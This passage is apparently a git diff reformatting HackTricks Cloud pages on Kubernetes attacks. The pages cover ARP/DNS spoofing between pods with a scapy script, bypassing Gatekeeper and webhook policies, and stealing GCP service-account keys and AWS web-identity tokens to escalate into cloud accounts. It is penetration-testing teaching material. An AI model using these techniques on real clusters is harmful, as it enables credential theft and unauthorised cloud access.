 ## ARP Spoofing in pods in the same Node
 
@@ -197,8 +182,7 @@ ngrep -d eth0
 # interacting with the mysql instance
 ```
 
-{% code title="arp_spoof.py" %}
-```python
+```python:arp_spoof.py
 #From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py
 from scapy.all import *
 
@@ -249,7 +233,6 @@ if __name__=="__main__":
 
 # To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
 ```
-{% endcode %}
 
 ### ARPSpoof
 
@@ -290,10 +273,9 @@ dig google.com
 google.com.		1	IN	A	1.1.1.1
 ```
 
-{% hint style="info" %}
-If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\
-You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
-{% endhint %}
+> [!NOTE]
+> If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\
+> You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
 
 ## Capturing Traffic
 
@@ -302,20 +284,7 @@ It will install agents in the selected pods and gather their traffic information
 
 ## References
 
-* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
-* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
+- [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
+- [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
similarity index 100%
rename from pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
similarity index 79%
rename from pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
index cea42a07d..96cf3b0e3 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
@@ -28,7 +28,7 @@ $ kubectl get k8smandatorylabels
 
 A Graphic User Interface may also be available to access the OPA rules with **Gatekeeper Policy Manager.** It is "a simple _read-only_ web UI for viewing OPA Gatekeeper policies' status in a Kubernetes Cluster."
 
-

+

 
 Search for the exposed service :
 
@@ -45,19 +45,19 @@ As illustrated in the image above, certain rules may not be applied universally
 
 With a comprehensive overview of the Gatekeeper configuration, it's possible to identify potential misconfigurations that could be exploited to gain privileges. Look for whitelisted or excluded namespaces where the rule doesn't apply, and then carry out your attack there.
 
-{% content-ref url="../abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](../abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
+{{#ref}}
+../abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
 
 ## Abusing ValidatingWebhookConfiguration
 
 Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource : 
 
-{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %}
-[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md)
-{% endcontent-ref %}
+{{#ref}}
+../kubernetes-validatingwebhookconfiguration.md
+{{#endref}}
 
 ## References
 
-* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-* [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager)
+- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager)
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
similarity index 64%
rename from pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
index e9de02721..b5958557f 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
@@ -1,19 +1,6 @@
 # Kubernetes Pivoting to Clouds
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## GCP
 
@@ -23,27 +10,26 @@ If you are running a k8s cluster inside GCP you will probably want that some app
 
 A common way to give **access to a kubernetes application to GCP** is to:
 
-* Create a GCP Service Account
-* Bind on it the desired permissions
-* Download a json key of the created SA
-* Mount it as a secret inside the pod
-* Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is.
+- Create a GCP Service Account
+- Bind on it the desired permissions
+- Download a json key of the created SA
+- Mount it as a secret inside the pod
+- Set the GOOGLE_APPLICATION_CREDENTIALS environment variable pointing to the path where the json is.
 
-{% hint style="warning" %}
-Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
-{% endhint %}
+> [!WARNING]
+> Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
 
 ### Relating GSA json to KSA secret
 
 A way to give access to a GSA to a GKE cluser is by binding them in this way:
 
-* Create a Kubernetes service account in the same namespace as your GKE cluster using the following command:
+- Create a Kubernetes service account in the same namespace as your GKE cluster using the following command:
 
 ```bash
 Copy codekubectl create serviceaccount 
 ```
 
-* Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the `gcloud` command-line tool, as shown in the following example:
+- Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the `gcloud` command-line tool, as shown in the following example:
 
 ```bash
 Copy codegcloud iam service-accounts keys create .json \
@@ -52,16 +38,15 @@ kubectl create secret generic  \
     --from-file=key.json=.json
 ```
 
-* Bind the Kubernetes Secret to the Kubernetes service account using the following command:
+- Bind the Kubernetes Secret to the Kubernetes service account using the following command:
 
 ```bash
 Copy codekubectl annotate serviceaccount  \
     iam.gke.io/gcp-service-account=
 ```
 
-{% hint style="warning" %}
-In the **second step** it was set the **credentials of the GSA as secret of the KSA**. Then, if you can **read that secret** from **inside** the **GKE** cluster, you can **escalate to that GCP service account**.
-{% endhint %}
+> [!WARNING]
+> In the **second step** it was set the **credentials of the GSA as secret of the KSA**. Then, if you can **read that secret** from **inside** the **GKE** cluster, you can **escalate to that GCP service account**.
 
 ### GKE Workload Identity
 
@@ -69,28 +54,23 @@ With Workload Identity, we can configure a[ Kubernetes service account](https://
 
 The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate.
 
-* **Enable Workload Identity** on a new cluster
+- **Enable Workload Identity** on a new cluster
 
-{% code overflow="wrap" %}
 ```bash
 gcloud container clusters update  \
     --region=us-central1 \
     --workload-pool=.svc.id.goog
 ```
-{% endcode %}
 
-* **Create/Update a new nodepool** (Autopilot clusters don't need this)
+- **Create/Update a new nodepool** (Autopilot clusters don't need this)
 
-{% code overflow="wrap" %}
 ```bash
 # You could update instead of create
 gcloud container node-pools create  --cluster= --workload-metadata=GKE_METADATA --region=us-central1
 ```
-{% endcode %}
 
-* Create the **GCP Service Account to impersonate** from K8s with GCP permissions:
+- Create the **GCP Service Account to impersonate** from K8s with GCP permissions:
 
-{% code overflow="wrap" %}
 ```bash
 # Create SA called "gsa2ksa"
 gcloud iam service-accounts create gsa2ksa --project=
@@ -100,11 +80,9 @@ gcloud projects add-iam-policy-binding  \
     --member "serviceAccount:gsa2ksa@.iam.gserviceaccount.com" \
     --role "roles/iam.securityReviewer"
 ```
-{% endcode %}
 
-* **Connect** to the **cluster** and **create** the **service account** to use
+- **Connect** to the **cluster** and **create** the **service account** to use
 
-{% code overflow="wrap" %}
 ```bash
 # Get k8s creds
 gcloud container clusters get-credentials  --region=us-central1
@@ -115,11 +93,9 @@ kubectl create namespace testing
 # Create the KSA
 kubectl create serviceaccount ksa2gcp -n testing
 ```
-{% endcode %}
 
-* **Bind the GSA with the KSA**
+- **Bind the GSA with the KSA**
 
-{% code overflow="wrap" %}
 ```bash
 # Allow the KSA to access the GSA in GCP IAM
 gcloud iam service-accounts add-iam-policy-binding gsa2ksa@ [!WARNING]
+> As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\
+> From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**.
 
 This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**:
 
@@ -195,18 +167,15 @@ An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://githu
 
 First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object:
 
-{% code title="Kiam" %}
-```yaml
+```yaml:Kiam
 kind: Namespace
 metadata:
   name: iam-example
   annotations:
     iam.amazonaws.com/permitted: ".*"
 ```
-{% endcode %}
 
-{% code title="Kube2iam" %}
-```yaml
+```yaml:Kube2iam
 apiVersion: v1
 kind: Namespace
 metadata:
@@ -215,12 +184,10 @@ metadata:
       ["role-arn"]
   name: default
 ```
-{% endcode %}
 
 Once the namespace is configured with the IAM roles the Pods can have you can **indicate the role you want on each pod definition with something like**:
 
-{% code title="Kiam & Kube2iam" %}
-```yaml
+```yaml:Kiam & Kube2iam
 kind: Pod
 metadata:
   name: foo
@@ -228,17 +195,14 @@ metadata:
   annotations:
     iam.amazonaws.com/role: reportingdb-reader
 ```
-{% endcode %}
 
-{% hint style="warning" %}
-As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
-{% endhint %}
+> [!WARNING]
+> As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles).
 
 #### Create Pod with IAM Role
 
-{% hint style="info" %}
-The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
-{% endhint %}
+> [!NOTE]
+> The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
 
 ```yaml
 echo 'apiVersion: v1
@@ -284,27 +248,23 @@ kubectl annotate serviceaccount -n $namespace $service_account eks.amazonaws.com
 
 To **get aws using the token** from `/var/run/secrets/eks.amazonaws.com/serviceaccount/token` run:
 
-{% code overflow="wrap" %}
 ```bash
 aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/EKSOIDCTesting --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token
 ```
-{% endcode %}
 
-{% hint style="warning" %}
-As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token.
+> [!WARNING]
+> As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token.
+>
+> Moreover, if you are inside a pod, check for env variables like **AWS_ROLE_ARN** and **AWS_WEB_IDENTITY_TOKEN.**
 
-Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.**
-{% endhint %}
+> [!CAUTION]
+> Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role.
+>
+> Check the **following page for more information**:
 
-{% hint style="danger" %}
-Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role.
-
-Check the **following page for more information**:
-{% endhint %}
-
-{% content-ref url="../aws-security/aws-basic-information/aws-federation-abuse.md" %}
-[aws-federation-abuse.md](../aws-security/aws-basic-information/aws-federation-abuse.md)
-{% endcontent-ref %}
+{{#ref}}
+../aws-security/aws-basic-information/aws-federation-abuse.md
+{{#endref}}
 
 ### Find Pods a SAs with IAM Roles in the Cluster
 
@@ -356,21 +316,8 @@ fi
 
 ## References
 
-* [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
-* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
-* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
+- [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity)
+- [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
+- [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md b/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
similarity index 62%
rename from pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
index 4c5e3aa00..037697582 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md
@@ -1,19 +1,6 @@
 # Kubernetes Role-Based Access Control(RBAC)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Role-Based Access Control (RBAC)
 
@@ -29,9 +16,9 @@ RBAC’s permission model is built from **three individual parts**:
 
 The difference between “**Roles**” and “**ClusterRoles**” is just where the role will be applied – a “**Role**” will grant access to only **one** **specific** **namespace**, while a “**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to:
 
-* **cluster-scoped** resources (like nodes).
-* **non-resource** endpoints (like /healthz).
-* namespaced resources (like Pods), **across all namespaces**.
+- **cluster-scoped** resources (like nodes).
+- **non-resource** endpoints (like /healthz).
+- namespaced resources (like Pods), **across all namespaces**.
 
 From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like:
 
@@ -43,9 +30,9 @@ kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options
 
 In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role:
 
-* The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_.
-* The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true`
-* The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource.
+- The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_.
+- The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true`
+- The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource.
 
 ### Rules Verbs
 
@@ -61,46 +48,41 @@ In the template of a **Role** or a **ClusterRole** you will need to indicate the
 
 Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example:
 
-* [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
-  * `use` verb on `podsecuritypolicies` resources in the `policy` API group.
-* [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping)
-  * `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group.
-* [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
-  * `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group.
+- [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+  - `use` verb on `podsecuritypolicies` resources in the `policy` API group.
+- [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping)
+  - `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group.
+- [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
+  - `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group.
 
-{% hint style="warning" %}
-You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide`
-{% endhint %}
+> [!WARNING]
+> You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide`
 
 ### Examples
 
-{% code title="Role" %}
-```yaml
+```yaml:Role
 apiVersion: rbac.authorization.k8s.io/v1
 kind: Role
 metadata:
   namespace: defaultGreen
   name: pod-and-pod-logs-reader
 rules:
-- apiGroups: [""]
-  resources: ["pods", "pods/log"]
-  verbs: ["get", "list", "watch"]
+  - apiGroups: [""]
+    resources: ["pods", "pods/log"]
+    verbs: ["get", "list", "watch"]
 ```
-{% endcode %}
 
-{% code title="ClusterRole" %}
-```yaml
+```yaml:ClusterRole
 apiVersion: rbac.authorization.k8s.io/v1
 kind: ClusterRole
 metadata:
   # "namespace" omitted since ClusterRoles are not namespaced
   name: secret-reader
 rules:
-- apiGroups: [""]
-  resources: ["secrets"]
-  verbs: ["get", "watch", "list"]
+  - apiGroups: [""]
+    resources: ["secrets"]
+    verbs: ["get", "watch", "list"]
 ```
-{% endcode %}
 
 For example you can use a **ClusterRole** to allow a particular user to run:
 
@@ -112,8 +94,7 @@ kubectl get pods --all-namespaces
 
 [**From the docs:**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#rolebinding-and-clusterrolebinding) A **role binding grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**.
 
-{% code title="" %}
-```yaml
+```yaml:RoleBinding
 piVersion: rbac.authorization.k8s.io/v1
 # This role binding allows "jane" to read pods in the "default" namespace.
 # You need to already have a Role named "pod-reader" in that namespace.
@@ -122,35 +103,32 @@ metadata:
   name: read-pods
   namespace: default
 subjects:
-# You can specify more than one "subject"
-- kind: User
-  name: jane # "name" is case sensitive
-  apiGroup: rbac.authorization.k8s.io
+  # You can specify more than one "subject"
+  - kind: User
+    name: jane # "name" is case sensitive
+    apiGroup: rbac.authorization.k8s.io
 roleRef:
   # "roleRef" specifies the binding to a Role / ClusterRole
   kind: Role #this must be Role or ClusterRole
   name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to
   apiGroup: rbac.authorization.k8s.io
 ```
-{% endcode %}
 
-{% code title="ClusterRoleBinding" %}
-```yaml
+```yaml:ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1
 # This cluster role binding allows anyone in the "manager" group to read secrets in any namespace.
 kind: ClusterRoleBinding
 metadata:
   name: read-secrets-global
 subjects:
-- kind: Group
-  name: manager # Name is case sensitive
-  apiGroup: rbac.authorization.k8s.io
+  - kind: Group
+    name: manager # Name is case sensitive
+    apiGroup: rbac.authorization.k8s.io
 roleRef:
   kind: ClusterRole
   name: secret-reader
   apiGroup: rbac.authorization.k8s.io
 ```
-{% endcode %}
 
 **Permissions are additive** so if you have a clusterRole with “list” and “delete” secrets you can add it with a Role with “get”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.**
 
@@ -180,21 +158,8 @@ kubectl describe rolebindings
 
 ### Abuse Role/ClusterRoles for Privilege Escalation
 
-{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
similarity index 80%
rename from pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
index 512cbbab3..90c7e4173 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
@@ -26,25 +26,23 @@ webhook:
     url: https://example.com/webhook
     serviceAccountName: example-service-account
   rules:
-  - apiGroups:
-    - ""
-    apiVersions:
-    - "*"
-    operations:
-    - CREATE
-    - UPDATE
-    resources:
-    - pods
+    - apiGroups:
+        - ""
+      apiVersions:
+        - "*"
+      operations:
+        - CREATE
+        - UPDATE
+      resources:
+        - pods
 ```
 
 The main difference between a ValidatingWebhookConfiguration and policies : 
 
+
Kyverno.png

 
-
-
Kyverno.png

-
-* **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.
-* **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services
+- **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.
+- **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services
 
 ## Enumeration
 
@@ -76,15 +74,15 @@ Now, identify the following output :
 
 ```yaml
 namespaceSelector:
-    matchExpressions:
+  matchExpressions:
     - key: kubernetes.io/metadata.name
       operator: NotIn
       values:
-      - default
-      - TEST
-      - YOYO
-      - kube-system
-      - MYAPP
+        - default
+        - TEST
+        - YOYO
+        - kube-system
+        - MYAPP
 ```
 
 Here, `kubernetes.io/metadata.name` label refers to the namespace name. Namespaces with names in the `values` list will be excluded from the policy :
@@ -93,12 +91,12 @@ Check namespaces existence. Sometimes, due to automation or misconfiguration, so
 
 The goal of this attack is to exploit **misconfiguration** inside VWC in order to bypass operators restrictions and then elevate your privileges with other techniques
 
-{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
 
 ## References
 
-* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-* [https://kyverno.io/](https://kyverno.io/)
-* [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
+- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [https://kyverno.io/](https://kyverno.io/)
+- [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
similarity index 70%
rename from pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
rename to src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
index a12955aa1..a2a89e01b 100644
